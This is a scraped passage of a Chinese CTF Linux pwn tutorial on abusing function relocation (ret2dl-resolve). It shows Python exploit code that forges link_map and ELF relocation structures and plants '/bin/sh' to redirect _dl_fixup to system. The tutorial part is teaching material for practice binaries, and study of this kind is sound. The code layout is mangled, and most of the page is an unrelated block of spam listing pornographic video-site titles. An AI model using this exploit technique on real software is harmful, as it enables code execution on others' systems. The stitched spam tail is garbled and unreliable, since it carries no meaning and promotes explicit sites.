我們注意到fake_link_map中間有許多用\x00填充的空間,這些地方實際上寫啥都不影響我們的攻擊,因此我們充分利用空間,把三個結(jié)構(gòu)體跟/bin/sh\x00也塞進去。

offset = 0x253a0 #system - __libc_start_main

fake_Elf64_Dyn = ""
fake_Elf64_Dyn += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #d_tag? ?? ?? ?? ?? ? 從link_map中找.rel.plt不需要用到標簽, 隨意設置
fake_Elf64_Dyn += p64(fake_link_map_addr + 0x18)? ?? ?? ?? ?? ? #d_ptr? ?? ?? ?? ?? ? 指向偽造的Elf64_Rela結(jié)構(gòu)體,由于reloc_offset也被控制為0,不需要偽造多個結(jié)構(gòu)體

fake_Elf64_Rela = ""
fake_Elf64_Rela += p64(fake_link_map_addr - offset)? ?? ?? ?? ?? ? #r_offset? ?? ???rel_addr = l->addr+reloc_offset,直接指向fake_link_map所在位置令其可讀寫就行
fake_Elf64_Rela += p64(7)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #r_info? ?? ?? ?? ?? ? index設置為0,最后一字節(jié)必須為7
fake_Elf64_Rela += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #r_addend? ?? ???隨意設置

fake_Elf64_Sym = ""
fake_Elf64_Sym += p32(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #st_name? ?? ???隨意設置
fake_Elf64_Sym += 'AAAA'? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #st_info, st_other, st_shndx st_other非0以避免進入重定位符號的分支
fake_Elf64_Sym += p64(main_got-8)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#st_value? ?? ???已解析函數(shù)的got表地址-8,-8體現(xiàn)在匯編代碼中,原因不明
fake_Elf64_Sym += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #st_size? ?? ???隨意設置

fake_link_map_data = ""
fake_link_map_data += p64(offset)? ?? ?? ?? ?? ?? ?? ?? ?#l_addr,偽造為兩個函數(shù)的地址偏移值
fake_link_map_data += fake_Elf64_Dyn
fake_link_map_data += fake_Elf64_Rela
fake_link_map_data += fake_Elf64_Sym
fake_link_map_data += '\x00'*0x20
fake_link_map_data += p64(fake_link_map_addr)? ?? ?? ?? ?? ? #DT_STRTAB? ?? ???設置為一個可讀的地址
fake_link_map_data += p64(fake_link_map_addr + 0x30)#DT_SYMTAB? ?? ???指向?qū)Y(jié)構(gòu)體數(shù)組的地址
fake_link_map_data += "/bin/sh\x00"? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
fake_link_map_data += '\x00'*0x78
fake_link_map_data += p64(fake_link_map_addr + 0x8)? ?? ???#DT_JMPREL? ?? ???指向?qū)獢?shù)組結(jié)構(gòu)體的地址

現(xiàn)在我們需要做的就是棧劫持,偽造參數(shù)跳轉(zhuǎn)到_dl_fixup了。前兩者好說,_dl_fixup地址也在got表中的第2項。但是問題是這是一個保存了函數(shù)地址的地址,我們沒辦法放在棧上用ret跳過去,難道要再用一次萬能gadgets嗎?不,我們可以選擇這個:

把這行指令地址放到棧上,用ret就可以跳進_fix_up.現(xiàn)在我們需要的東西都齊了,只要把它們組裝起來,pwn it!

?課后例題和練習題非常重要,小伙伴請務必進行練習,進群后管理員會給大家發(fā)放哦。

練習題獲取入口

新來的朋友如果想要了解其他的必備技能和實用工具,可以點擊菜單欄中的入門錦囊查看相關(guān)內(nèi)容:

文章素材來源于i春秋社區(qū)

●?入門教程第一章:環(huán)境配置

●?入門教程第二章:棧溢出基礎

●?入門教程第三章:ShellCode

●?入門教程第四章:ROP技術(shù)

●?入門教程第五章:調(diào)整棧幀的技巧

●?入門教程第六章:利用漏洞獲取libc

●?入門教程第七章:格式化字符串漏洞

●?入門教程第八章:PIE與bypass思路

●?入門教程第九章:SROP

●?入門教程第十章:stack canary與繞過的思路

●?入門教程第十一章:針對函數(shù)重定位流程的相關(guān)測試

熱門回顧

/陷阱

安全意識必不可少

/培訓

滲透測試必備知識

End

i春秋官方公眾號為大家提供

前沿的網(wǎng)絡安全技術(shù)

簡單易懂的實用工具

緊張刺激的安全競賽

還有網(wǎng)絡安全大講堂

更多技能等你來解鎖

總結(jié)

以上是生活随笔為你收集整理的c# 定位内存快速增长_CTF丨Linux Pwn入门教程:针对函数重定位流程的相关测试(下)...的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。

一区二区中文字幕在线播放 | 日本中文字幕高清 | 亚洲天堂在线观看完整版 | 热久精品 | 成人动态视频 | 六月婷色| 国产高清99 | 亚洲精品字幕在线观看 | 91精品视频一区二区三区 | 久久观看最新视频 | 日本少妇久久久 | 97在线观视频免费观看 | 国产一二三区在线观看 | 狠狠色噜噜狠狠 | 国内小视频 | 亚洲精品高清一区二区三区四区 | 99久国产 | 国产精品激情在线观看 | 狠狠狠狠狠狠操 | 欧美精品视 | 最新国产精品久久精品 | 日韩亚洲精品电影 | 91免费视频网站在线观看 | 欧美国产日韩一区 | 亚洲精品国产精品99久久 | 西西444www高清大胆 | 久久免费视频观看 | 国产aaa大片 | 精品中文字幕视频 | 中文字幕国产亚洲 | 9999国产精品 | 中文字幕不卡在线88 | 亚洲精品一区二区三区高潮 | 日本精品视频在线观看 | 96精品高清视频在线观看软件特色 | 在线观看91久久久久久 | 国产精品永久久久久久久久久 | 国产福利免费看 | www天天干 | 亚洲精品视频在线看 | 91成人精品在线 | 中文字幕在线久一本久 | 国产高清在线a视频大全 | 六月丁香婷婷在线 | 啪啪av在线 | 亚洲深爱激情 | 在线色资源 | 成人一区二区三区中文字幕 | 亚洲精品欧美专区 | 亚洲一级特黄 | av经典在线 | 黄色免费观看网址 | 国产中文在线播放 | 日韩av手机在线观看 | 免费激情在线电影 | 九九色综合| 天堂av在线网址 | 狠狠色免费 | 在线中文字幕播放 | 日韩av在线免费播放 | 国产日韩中文在线 | 超碰激情在线 | 麻豆国产网站入口 | 亚洲精品久久久久中文字幕m男 | 中文字幕三区 | 国产精品丝袜久久久久久久不卡 | 一区二区三区高清 | 91综合久久一区二区 | 欧美激情h | 国产精品 日韩 欧美 | 久久国产精品一区二区 | 久久精品男人的天堂 | 久久草草热国产精品直播 | 国产精品一区二区三区四区在线观看 | 国产一级久久久 | 国产精品自产拍在线观看蜜 | 丁香久久激情 | 免费看的黄色小视频 | 伊人午夜视频 | 成人在线免费视频 | 精品久久国产精品 | 国产在线不卡一区 | 久久精品人 | 成人av免费看 | 免费看成人 | 丁香六月久久综合狠狠色 | 美女网站久久 | 精品亚洲男同gayvideo网站 | 丁香婷婷激情网 | 精品国产乱码久久久久久天美 | 免费av免费观看 | 又黄又爽又湿又无遮挡的在线视频 | 国产手机在线播放 | 中文字幕高清视频 | 久久亚洲免费视频 | 久久看片网 | 婷婷午夜 | 99精品99| 日韩精品久久久免费观看夜色 | 日韩一级电影在线 | 亚洲精品国偷拍自产在线观看蜜桃 | 亚洲国产成人久久综合 | 免费影视大全推荐 | 成年人免费看片网站 | 精品爱爱 | 久久国产精品第一页 | 国内久久看| 香蕉视频在线观看免费 | 免费成视频 | 免费色视频网站 | 中日韩在线 | 中国一级片视频 | 久久8| 久久综合久久综合久久综合 | 99热9 | 中文字幕在线观看日本 | 久久精品国产亚洲精品 | 日日干天天爽 | 日本xxxx.com | 精品一区二区免费 | 99热亚洲精品 | 久久久九色精品国产一区二区三区 | 亚洲91中文字幕无线码三区 | 欧美一进一出抽搐大尺度视频 | 国产视频一区精品 | 国产精品毛片一区二区在线 | 午夜资源站 | 日韩激情视频在线 | 中文在线天堂资源 | 日本不卡视频 | 九色琪琪久久综合网天天 | 精品亚洲一区二区三区 | 综合网伊人 | 97精品国产97久久久久久久久久久久 | 欧美一区二区在线 | 黄色www免费 | 国产日韩精品一区二区三区 | 九九九九色 | 午夜久久久精品 | 美女久久精品 | 婷婷香蕉| 亚洲欧洲精品视频 | 久久艹影院 | 中文字幕在线久一本久 | 色天天天| 最新日本中文字幕 | 久久久久久久久久亚洲精品 | 精品国产一区二区三区免费 | 久久久久久亚洲精品 | 免费开视频 | 久久精品视频在线 | 国产福利电影网址 | 在线免费av网站 | 久久99精品久久久久久三级 | 国产一级二级在线播放 | 中文国产成人精品久久一 | 韩国av不卡 | 丁香婷婷久久 | 日韩理论电影网 | 天天在线免费视频 | 中文字幕久久久精品 | 视频在线精品 | 美女av免费| 色网站国产精品 | 欧美特一级片 | 国产精品av在线免费观看 | 国产精品亚 | 国产视频一区二区在线观看 | 手机在线看永久av片免费 | 免费视频一区 | 成人一区影院 | 国产五月天婷婷 | 国产91免费在线 | 日韩欧美精品在线观看视频 | 婷婷六月久久 | 在线免费观看国产视频 | 中文网丁香综合网 | 人人干网站 | 九九久 | 成年人在线 | 91麻豆福利| 国产在线观看,日本 | 国产成人久久av免费高清密臂 | 免费视频黄色 | 免费看亚洲毛片 | 国内精品免费 | 国产视频2 | 婷婷综合激情 | 久久黄色免费观看 | 91精品国产电影 | 深夜国产福利 | 亚洲 综合 激情 | 99精品在线视频观看 | 美女网站在线免费观看 | www日韩精品 | 国产福利小视频在线 | 一级性生活片 | 17婷婷久久www | 国产成人在线播放 | aaa日本高清在线播放免费观看 | 精品国产精品久久一区免费式 | 国产成人av电影在线观看 | 日韩高清在线看 | 91视频免费播放 | 久久久久综合网 | 超碰在线人人 | 一级淫片在线观看 | 中文字幕在线久一本久 | av噜噜噜在线播放 | 97天天综合网 | 免费a级大片 | 精品国产成人av | 麻豆影音先锋 | 久久视频热 | 日韩在线资源 | 欧美日韩久久久 | 91一区二区三区在线观看 | 在线av资源 | 蜜臀av性久久久久蜜臀aⅴ流畅 | 国产一区二区在线视频观看 | 最新中文字幕在线资源 | 亚洲免费观看在线视频 | 日韩一级电影网站 | 在线观看av国产 | 97精品国产91久久久久久久 | 亚洲国产精品va在线看黑人动漫 | 久久国产午夜精品理论片最新版本 | 黄色软件在线观看免费 | 日韩免费高清在线 | 欧美小视频在线观看 | 国产精品视频全国免费观看 | 久久久香蕉视频 | 麻豆久久久久久久 | 字幕网资源站中文字幕 | 国产精品久久久久久欧美 | 亚洲热视频 | 99热最新在线| 免费视频 三区 | 青青草视频精品 | 欧美a级在线免费观看 | 97精品超碰一区二区三区 | 在线激情网 | 国产糖心vlog在线观看 | 免费视频二区 | 日日干天天爽 | 麻豆系列在线观看 | 在线高清 | 午夜三级福利 | 91成人免费在线视频 | 亚洲一级免费电影 | 亚洲精品国产品国语在线 | 色婷婷av在线 | 久久久久久久久久久久久久免费看 | 美女天天操| 999男人的天堂 | 在线黄色国产电影 | 中文字幕第 | 国产福利一区在线观看 | 欧美日韩视频在线观看一区二区 | 激情婷婷色 | 亚洲在线精品视频 | 黄色一级免费网站 | 久久久噜噜噜久久久 | 97免费在线观看 | 日韩精品一区二区三区丰满 | 久久丁香| 91久久国产露脸精品国产闺蜜 | 亚洲一区二区三区精品在线观看 | 国产成人精品亚洲日本在线观看 | 亚洲精品久久久久久国 | 欧美日韩国产成人 | 亚洲国产精选 | www.eeuss影院av撸| 91自拍成人 | 成年人视频在线观看免费 | 色www免费视频 | 成人久久电影 | 久久人人爽爽 | 91探花在线 | 国产第一页福利影院 | 久久国产精品免费 | 欧美最猛性xxxx | 色噜噜日韩精品欧美一区二区 | 欧美精品少妇xxxxx喷水 | 97色在线| 亚洲区另类春色综合小说校园片 | 日韩中文字幕第一页 | 国产精品免费久久久久久久久久中文 | 久久久久国产精品视频 | 中文av字幕在线观看 | 最新色视频 | 玖玖玖国产精品 | aa一级片 | 日韩久久网站 | 日韩在线播放av | 精品一区二区三区电影 | 视频直播国产精品 | 亚洲色图27p | 亚洲视频99| 国产一区二区在线免费播放 | 香蕉视频国产在线观看 | 激情一区二区三区欧美 | 日韩欧美精品一区二区 | 久久精品欧美一区二区三区麻豆 | 99热官网 | 丝袜美女视频网站 | 91福利区一区二区三区 | 天天躁天天操 | 亚洲黄色在线播放 | 久久99精品久久只有精品 | 天天爽天天爽天天爽 | 97日日| 久久综合九色综合97_ 久久久 | 国产成人亚洲精品自产在线 | 久久久久久国产精品999 | 成人在线观看资源 | 在线日韩中文 | 精品久久久一区二区 | 亚洲精品午夜久久久久久久 | 国产美女视频一区 | 欧美日韩精品免费观看 | 日韩久久久久久久久久久久 | 色综合久久久久综合体 | 91人人澡人人爽人人精品 | www亚洲视频 | 狠狠色网 | 欧美日韩亚洲一 | 91秒拍国产福利一区 | 国语精品免费视频 | 亚洲日韩欧美一区二区在线 | 樱空桃av | 国产又粗又猛又爽 | 五月天综合婷婷 | www.亚洲精品 | 欧美最猛性xxxxx免费 | 国产视频一区二区三区在线 | 99精品热 | 波多野结衣在线中文字幕 | 免费在线黄色av | 美女黄久久 | 国产精品99久久免费观看 | 国产色拍| 国产资源| 一区二区理论片 | 亚洲精品18日本一区app | 国产日韩在线视频 | 日韩一区二区三区免费视频 | 国产免费a | 久久精品79国产精品 | 国产精品原创在线 | 天天干天天操天天做 | 在线看成人 | 日韩三级视频在线看 | 91欧美视频网站 | 久久免费99 | 欧美精品乱码久久久久 | 国产精品自产拍在线观看 | 免费在线 | 99精品在线免费在线观看 | 亚洲国产视频在线 | 精品一区精品二区高清 | 91精品国产综合久久福利不卡 | 亚洲高清在线观看视频 | 亚洲精品在线观看不卡 | 99热在线这里只有精品 | 91久久奴性调教 | 视频三区在线 | 久久资源在线 | 日韩精品免费一区二区 | 成片免费观看视频999 | 97免费视频在线播放 | 免费av高清 | 99视频播放 | 一区二区三区播放 | 日韩免费观看一区二区 | 欧美日本高清视频 | 日本久久久久久久久 | 91成人免费看片 | 69久久99精品久久久久婷婷 | 99视频精品免费视频 | 久久少妇av| 人人爽人人澡人人添人人人人 | 午夜a区 | 天天干天天爽 | 国产尤物视频在线 | 91免费日韩| 午夜三级大片 | 波多野结衣一区三区 | 久草视频精品 | 激情视频在线高清看 | 三级a视频| 97超碰总站| 免费观看久久 | 99久久久国产精品美女 | 天天看天天干天天操 | 久久成熟 | 国产99色| 天天干天天拍天天操天天拍 | 免费在线观看污网站 | 亚洲乱码精品 | 麻豆视频在线看 | 中文资源在线观看 | av免费看电影 | 在线观看亚洲电影 | 丁香六月av| 天天人人综合 | av在观看| 婷婷在线色 | 色妞色视频一区二区三区四区 | 在线看片一区 | 国产亲近乱来精品 | 中文字幕日韩精品有码视频 | 成人黄大片视频在线观看 | 成人免费中文字幕 | 国产亚洲一区二区在线观看 | 国产精品短视频 | 色香蕉视频 | av不卡免费在线观看 | 欧美精品久久久久久久久久 | 久久爱影视i | 精品女同一区二区三区在线观看 | 免费看色的网站 | www.天天射.com | 亚洲精品网页 | 精品 一区 在线 | 精品国产久 | 国产欧美在线一区二区三区 | 国内综合精品午夜久久资源 | 91探花系列在线播放 | 在线观看一区二区视频 | 亚洲综合婷婷 | 一区二区三区在线观看免费 | 免费av看片 | 久草视频视频在线播放 | 国产1级视频 | 五月婷婷综合激情 | 999亚洲国产996395 | 色综合久久综合网 | 91精品国自产拍天天拍 | 成人福利在线观看 | 国产a级片免费观看 | 成人va视频 | 国产成人精品网站 | 91色欧美 | 91精品播放 | 在线免费色 | 深爱激情亚洲 | 激情狠狠干 | 欧美一区二区三区四区夜夜大片 | 91丨九色丨国产在线观看 | 欧美日韩中文视频 | 久久久久成人精品亚洲国产 | freejavvideo日本免费 | 国产二区免费视频 | 成人免费一级片 | 四虎5151久久欧美毛片 | 婷婷开心久久网 | 久热只有精品 | 深夜免费网站 | 久久久高清一区二区三区 | 成人91在线观看 | 91视频午夜| 久久99精品久久久久久秒播蜜臀 | 三级av在线播放 | 欧美污污网站 | 国产精品成人久久久久 | 国产精品免费久久久久久久久久中文 | 欧美analxxxx| 国产精品久久久久久久99 | 天天操天天透 | 成人午夜在线观看 | 欧美一区二区在线 | 九九热免费在线观看 | 国内小视频 | 少妇视频在线播放 | 99re在线视频观看 | 日韩精品观看 | 久草在线视频免费资源观看 | 九九热免费在线观看 | 国产亚洲精品无 | 日韩欧美大片免费观看 | 国产成人无码AⅤ片在线观 日韩av不卡在线 | 日日麻批40分钟视频免费观看 | 国产手机视频精品 | 午夜免费福利片 | av在线看网站 | 天天操网址 | 亚洲 欧美 91 | 99精品国产aⅴ | 九色视频网址 | 亚洲精品字幕在线 | 久久av黄色| 久久综合色播五月 | 黄色亚洲| 亚洲日本精品 | 99热精品免费观看 | 天天操天天添天天吹 | 亚洲午夜激情网 | 最近日本mv字幕免费观看 | 91日韩在线播放 | 婷婷国产一区二区三区 | 97超级碰碰碰碰久久久久 | 97在线观看免费高清完整版在线观看 | 99视频精品全部免费 在线 | 国产精品一区二区三区在线播放 | 国产超碰97| av免费看电影 | 六月久久婷婷 | 国产精品久久伊人 | 欧美日韩精品在线观看 | 五月香视频在线观看 | 91视频在线免费看 | 日韩欧美在线视频一区二区三区 | 色91av| 伊人伊成久久人综合网站 | 久久精品这里都是精品 | av导航福利 | 午夜久久影院 | 黄色com| 丁香婷婷综合五月 | 狠狠色丁香九九婷婷综合五月 | 色网站在线观看 | 久草在线观 | 高清av免费一区中文字幕 | 欧美一二区视频 | 日韩免费高清在线观看 | 国产精彩视频一区二区 | 97福利在线 | 九九精品毛片 | sm免费xx网站 | av在线看网站| 免费网站看av片 | 91麻豆精品国产91久久久久久久久 | 九九久久精品 | 日韩精品一区二区三区在线视频 | 不卡日韩av | 伊人婷婷色| 久一久久 | 操操操日日日干干干 | 国产日韩精品一区二区在线观看播放 | 日韩精品一区二 | 黄色影院在线免费观看 | 国产精品麻豆99久久久久久 | 日韩av免费在线看 | 一级黄色片在线免费观看 | 国产美女精彩久久 | 国产综合精品久久 | 久久久久伦理电影 | 欧美成人91 | 国产成人福利 | 免费av网址大全 | 99久久综合精品五月天 | 美州a亚洲一视本频v色道 | 超级av在线 | 麻豆 free xxxx movies hd | 国产精品永久免费在线 | 亚洲综合一区二区精品导航 | 精品国产一区二区三区在线观看 | 91看片一区二区三区 | 日韩免费视频在线观看 | www免费在线观看 | av中文字幕不卡 | 久久免费成人精品视频 | 久久乱码卡一卡2卡三卡四 五月婷婷久 | 国产在线视频资源 | 亚洲视频免费在线 | 久久久久 免费视频 | 国产999精品久久久久久绿帽 | 国产精品999久久久 久产久精国产品 | 最近最新中文字幕视频 | 日本精品久久久一区二区三区 | 欧美,日韩| 国产精品美女久久久久久久久 | 久久视频精品 | 久久精品视频免费 | 色婷婷久久 | 久热超碰| 精品国产诱惑 | 91精品一区二区三区久久久久久 | 久久久久草 | 国产三级国产精品国产专区50 | 欧美一级免费黄色片 | 日韩高清不卡一区二区三区 | 91看片淫黄大片在线播放 | 久久福利影视 | 日韩成人av在线 | 天天干天天搞天天射 | 久久av在线播放 | 91精品少妇偷拍99 | 91视频免费 | 91久草视频| av资源免费在线观看 | 国产精品三级视频 | 免费看三级黄色片 | 视频在线观看国产 | 在线看片a | 亚洲婷婷免费 | 99久久夜色精品国产亚洲96 | 中文字幕av免费 | 国产一级二级av | 亚洲极色 | 国产精品视频线看 | 色天天中文 | 国产一级黄色av | 精品成人免费 | 在线看v片成人 | 欧美一二三区播放 | 久久撸在线视频 | 丁香国产视频 | 69av视频在线观看 | 中文字幕免费播放 | 久久99在线视频 | 久久高视频 | 中文字幕中文字幕在线中文字幕三区 | 久久久久免费视频 | 91九色在线 | 久久r精品 | 69国产盗摄一区二区三区五区 | 久久99九九99精品 | 亚洲精品午夜国产va久久成人 | 亚洲欧洲国产日韩精品 | 国产久草在线 | 人人插人人插 | 玖玖玖在线 | 色综合天天视频在线观看 | 黄色av影院 | 天天干天天操天天拍 | 黄色免费网战 | 一级a性色生活片久久毛片波多野 | 国产精品免费久久久久 | 黄色影院在线观看 | 99久久精品免费看国产一区二区三区 | 欧美精品久久久久久久久久久 | 亚洲精品婷婷 | 久久久噜噜噜久久久 | 黄色软件在线观看免费 | 久久一区二区三区四区 | 日日碰夜夜爽 | 久久不射电影院 | 国产精品欧美日韩 | 怡春院av| 午夜少妇av| 在线成人短视频 | 久久久久99999 | 日日夜夜天天 | 国内精品视频在线 | 精品国产精品久久一区免费式 | 91视视频在线直接观看在线看网页在线看 | 精品一区av | 久久新视频| 999视频在线观看 | 最近最新中文字幕视频 | 深夜精品福利 | 国产精品日韩在线播放 | 激情偷乱人伦小说视频在线观看 | 999电影免费在线观看2020 | 97国产精品| 国产精品久久久区三区天天噜 | 青青河边草免费直播 | av三级在线免费观看 | 性色va | 亚洲国产日韩精品 | 国产亚洲精品成人av久久ww | 亚洲精品中文在线 | 欧美少妇xxx | 日韩网页 | 免费成人在线观看视频 | 久久爽久久爽久久av东京爽 | 91久久国产综合精品女同国语 | 国产乱对白刺激视频在线观看女王 | 国产成人三级在线 | 日日爱999| 欧洲激情综合 | 国产91精品看黄网站 | 国产成人一区二区精品非洲 | 亚洲色图av | 不卡的av在线播放 | 国产五月婷婷 | av天天草| 精品国产一区二区三区久久久 | 六月丁香激情综合色啪小说 | 婷婷在线色 | 国产精品久久久久一区二区三区 | 国产精品成人久久久久 | 永久免费的av电影 | 色九九影院 | 美女视频黄频大全免费 | 美女免费视频黄 | 国产中文字幕视频在线 | 国产精品一区二区久久久久 | 亚洲成人免费在线 | 国产精品毛片一区二区在线看 | av网站大全免费 | 免费视频在线观看网站 | 国产福利一区二区三区视频 | 狠狠做六月爱婷婷综合aⅴ 日本高清免费中文字幕 | 午夜久久精品 | 西西444www大胆高清视频 | 久久久精华网 | 欧美一区二区在线刺激视频 | 天天操天天射天天 | 日韩二三区 | 亚洲成av人片在线观看香蕉 | 九七视频在线 | 一区av在线播放 | 亚洲精品国产视频 | 国产精品白浆视频 | 天天摸夜夜操 | 久久国产品 | 99av在线视频 | 97电影在线 | 亚洲精品激情 | 99免费看片 | www.伊人色.com| 久久久久久久久久久综合 | 国产日韩欧美综合在线 | 国产特级毛片aaaaaa | 国产99久久久国产精品免费二区 | 国产精品成人一区二区三区吃奶 | 亚洲免费色 | 亚洲精品国产成人 | 在线视频一区二区 | 成人av在线电影 | 99精品区 | 久久亚洲私人国产精品va | 免费av试看 | 亚洲精品久久久久www | 爱av在线网 | 91九色pron| 人人爱人人做人人爽 | 成人a在线观看高清电影 | 欧美色图p| www.成人精品 | 国产亚洲精品综合一区91 | 手机在线看片日韩 | 探花视频免费观看 | 免费网站在线观看人 | 五月婷婷在线观看 | 久久伊人精品一区二区三区 | 亚洲人xxx| 久久久久久久国产精品影院 | 精品亚洲在线 | 亚洲综合丁香 | wwwav视频| 中文字幕久久精品一区 | 久久婷婷精品 | 亚洲精品一区二区三区高潮 | 最新高清无码专区 | 国产精品成人免费精品自在线观看 | 欧美精品999 | 中文字幕亚洲精品日韩 | 国产免费不卡 | 97精品超碰一区二区三区 | 国产精品成人一区二区三区 | 91精品对白一区国产伦 | 免费视频久久久久久久 | 国产精品21区 | 在线观看mv的中文字幕网站 | 91超国产| 免费成人av网站 | 欧洲av在线 | 人人精品| 日日干夜夜爱 | 成 人 黄 色 片 在线播放 | 韩国精品视频在线观看 | 波多野结衣综合网 | 青青河边草观看完整版高清 | 啪啪资源| 色爱区综合激月婷婷 | 麻豆精品传媒视频 | 久久久96 | 黄色一级大片在线观看 | 亚洲激情一区二区三区 | 国产精品毛片一区视频播不卡 | av成人在线播放 | 黄色在线观看污 | 欧美激情xxxx | 国产九色视频在线观看 | 国产一级免费播放 | 97在线观看视频 | 综合网欧美 | 国产色区 | 国产电影黄色av | 久九视频 | 色资源网免费观看视频 | 伊人电影天堂 | 久久久受www免费人成 | 最近中文字幕mv免费高清在线 | 久久tv视频 | 国产精品一二三 | www日韩视频 | 久草在线在线 | 国产另类xxxxhd高清 | 超碰av免费 | 久精品视频在线观看 | www.天天操.com | 久久免费看片 | 黄色福利视频网站 | 香蕉久久久久久久 | 精品一区三区 | 在线亚洲播放 | 永久免费的av电影 | 激情视频国产 | 久久久久久毛片精品免费不卡 | 天天色综合三 | 伊人视频 | 国产69精品久久99的直播节目 | av看片网址| 91视频观看免费 | 最近中文字幕在线 | 青草视频免费观看 | 成人蜜桃视频 | 欧美一级日韩免费不卡 | 国产97色在线 | 在线免费观看国产黄色 | 视频精品一区二区三区 | 日韩午夜av | 日韩女同av | 五月婷婷在线观看 | 色欧美成人精品a∨在线观看 | 在线观看v片 | 狠狠黄| 国精产品999国精产品视频 | 99热99热 | 久热电影 | 久久国产区 | 国产护士hd高朝护士1 | 日韩高清无线码2023 | 久久久免费毛片 | 婷婷成人亚洲综合国产xv88 | 国产精品永久久久久久久久久 | 亚洲天堂网视频 | 五月天综合激情 | 国产精品久久久久久久午夜片 | 色综合天天视频在线观看 | 91在线国内视频 | 亚洲视频国产 | 中文字幕欧美日韩va免费视频 | 国产成人无码AⅤ片在线观 日韩av不卡在线 | 91cn国产在线| 亚洲一二区视频 | 色综合久久88色综合天天6 | 2021av在线 | 国产 在线 日韩 | 午夜精品一区二区三区在线播放 | 天天干天天拍天天操天天拍 | 欧美91视频 | www.狠狠操| 国产精品99久久久久久人免费 | 在线导航av | 最新av在线免费观看 | 很黄很污的视频网站 | 看片网站黄 | 在线看国产日韩 | 日韩特级毛片 | 欧美另类色图 | 人人干人人搞 | av丁香花 | 亚洲日本中文字幕在线观看 | 亚洲人在线 | 人人爽人人爽人人片av | 成人v| 国产精品中文字幕在线 | 天堂av免费观看 | 天天干天天做天天爱 | 国产精品久久久久av福利动漫 | 久久成人综合 | 99久久精品视频免费 | 97在线免费视频观看 | 日日干夜夜干 | 在线av资源 | 中文在线字幕免费观 | 韩日电影在线 | 精品国产黄色片 | 欧美一区免费在线观看 | 国产资源在线观看 | 久久久免费高清视频 | 亚洲精品久久久蜜桃直播 | 日韩高清一区 | 在线小视频 | 国内精品视频免费 | 四虎在线永久免费观看 | 色综合久久88色综合天天6 | 国产精品久久久久久麻豆一区 | 久久99精品国产一区二区三区 | 欧美综合色 | 视频国产一区二区三区 | 丁香久久婷婷 | 91视频午夜 | 五月综合在线观看 | 国产原创在线 | 免费av网址在线观看 | 国产精品久久久久久久久久尿 | 日一日操一操 | 欧美国产日韩一区二区 | 欧美网站黄色 | 亚洲经典中文字幕 | 亚洲精品在线二区 | 人人澡人人舔 | 岛国大片免费视频 | 国产原创中文在线 | 91精品高清| 欧美午夜理伦三级在线观看 | 久久久久久毛片精品免费不卡 | 欧美成人精品欧美一级乱黄 | wwwww.国产| 欧美性色综合 | 亚洲精品综合在线观看 | 免费观看v片在线观看 | 久久夜av | av免费网站| 国产精品乱码高清在线看 | 成人观看视频 | 成人h动漫在线看 | 日韩在线观看视频一区二区三区 | 久久免费视频网站 | 国产高清免费视频 | 视频一区二区视频 | 亚洲国产欧美在线看片xxoo | 午夜精品久久久久久久99婷婷 | 丰满少妇一级 | 97超视频在线观看 | 久久精品二区 | 久久国产经典视频 | 黄色aaa毛片 | 黄在线免费看 | 一级黄毛片 | 国产黄色大全 | 国产精品无av码在线观看 | 中文字幕 在线看 | 91污污视频在线观看 | 中文字幕av在线电影 | 久久黄色成人 | 国产精品麻豆欧美日韩ww | 女人18毛片a级毛片一区二区 | 在线a人片免费观看视频 | 五月婷婷激情综合 | 香蕉久草在线 | 免费看一级 | 青青草在久久免费久久免费 | 成人免费网站在线观看 | 五月激情综合婷婷 | 美女视频网站久久 | 精品国产精品国产偷麻豆 | 在线观看视频在线观看 | 精品在线免费观看 | 久久久久女人精品毛片九一 | av蜜桃在线| 黄色av成人在线 | 欧美最新另类人妖 | 在线只有精品 | 亚洲激情在线播放 | 国产精品短视频 | 免费福利在线 | a黄色片在线观看 | 天天天天综合 | 在线观看中文字幕2021 | 伊人影院得得 | 四虎影视成人永久免费观看视频 | 男女靠逼app | 91亚洲精品国偷拍自产在线观看 | 国产一区 在线播放 | 国产精品美女www爽爽爽视频 | 国产一区二区在线免费播放 | 欧美另类性 | 免费三级大片 | 日韩网站视频 | 亚洲高清视频在线观看免费 | 国产无套精品久久久久久 | 成人精品一区二区三区电影免费 | 成人久久久电影 | 在线亚洲精品 | 中文乱幕日产无线码1区 | 91av视频观看| 国产精品日韩在线 | 狠狠色综合网站久久久久久久 | 国产成人精品一区二区在线 | 国产成人精品综合 | www最近高清中文国语在线观看 | 日韩午夜一级片 | 97超碰人人在线 | 国产成人精品一区二区三区免费 | 久久精品久久精品久久39 | 国产精品中文字幕在线观看 | 欧美一级片在线观看视频 | 这里只有精彩视频 | 在线观看中文 | 黄网站污 | 日批在线看 | 特级毛片在线 | 夜夜干夜夜 | 久久久久欧美精品999 | 日韩激情网| 久久久国产精品人人片99精片欧美一 | 在线免费观看黄色小说 | 99这里有精品 | 久久视了| 成人国产精品免费观看 |